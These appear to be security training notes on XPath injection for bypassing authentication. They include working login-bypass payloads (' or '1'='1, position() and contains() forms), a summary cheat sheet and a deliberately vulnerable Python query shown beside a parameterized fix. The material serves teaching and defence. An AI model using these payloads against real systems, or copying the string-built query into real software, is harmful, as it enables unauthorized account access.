XPath Injection - Authentication Bypass
Key Concepts
What is XPath?
XPath is a query language for selecting nodes from an XML document.
It is often used in web applications for data retrieval and authentication mechanisms.
What is XPath Injection?
An attack technique where an attacker manipulates user input to alter the structure of an XPath query, bypassing authentication or gaining unauthorized access.
XPath Query Example
Consider the following XML user data:
<users>
  <user>
    <username>htb-stdnt</username>
    <password>Academy_student!</password>
  </user>
  <user>
    <username>admin</username>
    <password>admin</password>
  </user>
</users>
Authentication might use the following query:
/users/user[username/text()='USERNAME' and password/text()='PASSWORD']
If user input is placed into this query without sanitization or parameter binding, injection becomes possible. Note that XPath evaluates "and" before "or", so in the resulting queries below the terms joined by "and" group together first.
Common Payloads
Universal True (Bypass Authentication):
' or '1'='1
Resulting Query:
/users/user[username/text()='' or '1'='1' and password/text()='']
Target a Specific User (Admin):
admin' or '1'='1
Resulting Query:
/users/user[username/text()='admin' or '1'='1' and password/text()='irrelevant']
Use Position-Based Targeting:
' or position()=2 or '
Change the 2 to a 3 to pivot to a different account:
' or position()=3 or '
Resulting Query:
/users/user[username/text()='' or position()=2 or '' and password/text()='irrelevant']
This targets the second user in the XML file (e.g., admin).
Substring Matching:
' or contains(.,'admin') or '
Resulting Query:
/users/user[username/text()='' or contains(.,'admin') or '' and password/text()='irrelevant']
Matches any user element whose string value (username, password, or any other child text) contains "admin".
Steps to Exploit
Analyze Application Behavior:
Understand how usernames and passwords are processed (e.g., via POST requests, cookies, etc.).
Test for Injection Points:
Inject payloads into the username or password fields to observe server responses.
Craft Payloads:
Use payloads like position() or contains() to refine your query targeting.
Privilege Escalation:
Use payloads to access specific accounts or enumerate users until the desired privileges are obtained.
Practical Exploitation Example
Payload to Target Admin (Second User):
username=' or position()=2 or '&password=irrelevant
Response Example:
Successfully logged in; the response reads "WELCOME SUPERUSER!".
Defense Measures
Sanitize Inputs:
Use proper input validation and encoding to prevent injection. Reject special characters like ', ", [, and ]. Treat this blocklist as defence in depth only; it does not replace parameter binding.
Parameterized Queries:
Avoid dynamically building XPath queries. Use parameterized XPath APIs, where $username and $password are XPath variables bound by the engine:
$query = "/users/user[username/text()=$username and password/text()=$password]";
The variables must be bound through the XPath API's variable mechanism (a variable resolver or variable arguments). If the language itself interpolates the string (as PHP does with $username inside double quotes), the query is still built from raw input and remains injectable.
Hash Passwords:
Ensure passwords are hashed before storage and comparison.
Error Messages:
Avoid detailed error messages that reveal query structures.
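The string-built login check beside its parameterized form, as an added example written for these notes (not code from the original page); it uses the sample document above and the third-party lxml library, which is assumed to be installed:

```python
from lxml import etree  # third-party; assumed installed

# Constructed copy of the sample user store from the notes above.
USERS_XML = b"""<users>
<user><username>htb-stdnt</username><password>Academy_student!</password></user>
<user><username>admin</username><password>admin</password></user>
</users>"""
ROOT = etree.fromstring(USERS_XML)

FORBIDDEN = set("'\"[]")  # metacharacters the notes say to reject


def input_is_safe(value: str) -> bool:
    """Blocklist check from the notes: reject XPath metacharacters.
    Defence in depth only; parameter binding is the real fix."""
    return not (FORBIDDEN & set(value))


def login_vulnerable(username: str, password: str):
    """String-built query: raw input becomes part of the XPath expression,
    so quotes and operators in the input change the query's structure."""
    query = (f"/users/user[username/text()='{username}' "
             f"and password/text()='{password}']")
    hits = ROOT.xpath(query)
    return hits[0].findtext("username") if hits else None


def login_parameterized(username: str, password: str):
    """Same predicate, but $username/$password are XPath variables bound by
    the engine (lxml passes keyword arguments as variables). The input is
    compared as literal text and is never parsed as part of the query."""
    query = ("/users/user[username/text()=$username "
             "and password/text()=$password]")
    hits = ROOT.xpath(query, username=username, password=password)
    return hits[0].findtext("username") if hits else None


if __name__ == "__main__":
    payload = "' or position()=2 or '"                  # payload from the notes
    print(login_vulnerable(payload, "irrelevant"))      # admin
    print(login_parameterized(payload, "irrelevant"))   # None
    print(input_is_safe(payload))                       # False
```

The same payload that selects the second user through the string-built query is compared as a literal username by the parameterized query and matches nothing.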
Key Takeaways
XPath Injection is similar to SQL Injection but targets XML queries.
Functions like position() and contains() can help refine targeting in complex scenarios.
Proper sanitization and secure coding practices are essential to mitigate these attacks.
Payloads to Remember
Scenario                            | Payload                        | Result
Bypass Authentication               | ' or '1'='1                    | Logs in as the first user.
Target Specific User (e.g., Admin)  | admin' or '1'='1               | Logs in as admin.
Position-Based User Targeting       | ' or position()=2 or '         | Logs in as the second user.
Substring Matching (Admin)          | ' or contains(.,'admin') or '  | Finds users with "admin" in username.